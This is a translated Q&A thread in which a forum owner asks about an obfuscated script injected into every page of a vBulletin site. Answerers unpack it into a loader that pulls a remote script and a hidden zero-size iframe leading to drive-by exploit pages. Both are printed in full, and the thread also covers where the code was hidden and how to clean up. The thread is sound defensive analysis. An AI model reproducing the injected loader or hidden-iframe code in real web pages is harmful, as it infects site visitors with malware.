我的网站3dsforums.com已被标记为包含恶意软件的攻击网站。根据谷歌网站管理员工具,这是可疑代码已注入每个页面:
<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>
因此,我有两个问题:
这实际上是违规代码吗?
我该如何删除它?
我似乎无法通过vBulletin中的模板或phpmyadmin找到它,所以我迷失了我应该做的事情。
感谢您的帮助。
答案 0 :(得分:4)
JS Beautifier解压缩如下:
var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);
它看起来很可疑(谁会混淆?),所以我会认为是的,这是问题所在,你应该删除它。
修改:现在恶意网站已备份,我可以分析其余部分:它似乎添加了iframe:
var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);
将其附加到head。
in.cgi脚本似乎会在User-Agent无法利用的情况下重定向到Google。否则,它会重定向到另一个恶意网站。
它继续与许多iframe分道扬..他们中的许多人什么都不做(尽管那时我只是在WinXP上尝试User-Agent用于MSIE 6),但我最终得到了两个Java小程序。当我反编译它们时,所有的名字都被破坏了,我没有费心去弄清楚它在做什么。
答案 1 :(得分:1)
您应该做的第一件事就是更改您的FTP或SSH登录名和密码。
以上看起来像是一个FTP漏洞。看起来您的操作系统更新已经过时,或者您要让全世界都写入您的文件。
即使您覆盖了文件,问题也可能会回来。所以我强烈建议检查
建议:将密码更改为强大的密码。例如KLioof *(&安培; ^ paswl
答案 2 :(得分:0)
实际上它隐藏在第6844和6845行的includes / functions.php中,两行正在用</head>替换their script+</head>
很难找到并且很聪明。
答案 3 :(得分:0)
我解决了这个问题。您必须在站点文件中找到并删除带有阴影字符串的 Base64 功能。它从字符串解码此脚本。